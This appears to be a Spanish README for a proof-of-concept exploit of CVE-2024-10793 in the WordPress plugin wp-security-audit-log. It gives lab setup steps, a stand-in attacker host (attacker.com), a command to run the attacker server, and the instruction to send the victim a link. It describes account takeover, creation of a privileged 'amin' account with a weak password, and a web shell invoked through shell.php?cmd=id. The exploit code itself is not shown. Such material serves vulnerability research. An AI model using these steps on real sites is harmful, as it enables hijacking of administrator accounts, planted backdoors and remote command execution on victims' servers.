
Exploit de prueba de concepto para CVE-2024-10793 dirigido al plugin de WordPress wp-security-audit-log. Demuestra toma de control de cuenta, creación de usuarios privilegiados, subida de shell y manipulación de administradores mediante solicitudes HTTP manipuladas.
Añade estas líneas a tu archivo hosts:
127.0.0.1 goodcms.lab
127.0.0.1 attacker.com
Lanza WordPress usando docker:
$ sudo systemctl start docker
$ sudo docker-compose up -d
Abre http://goodcms.lab:2121 y sigue los pasos de instalación de WordPress. Instala wp-security-audit-log.5.2.1 o versiones anteriores en WordPress.
Lanza el servidor atacante:
$ php -S 0:9091 -t ./exploit
Entrega http://attacker.com a la víctima y ¡Bingo!
Impactos del exploit:

Toma de control de cuenta y creación de usuario privilegiado PoC: Credenciales del atacante tras el exploit: { email: [email protected], username: amin, password: 123456 } (Puedes cambiarlas desde el código de xpl.js.)
Ejecuta el comando Shell: http://goodcms.lab:2121/wp-content/plugins/sogrid/shell.php?cmd=id
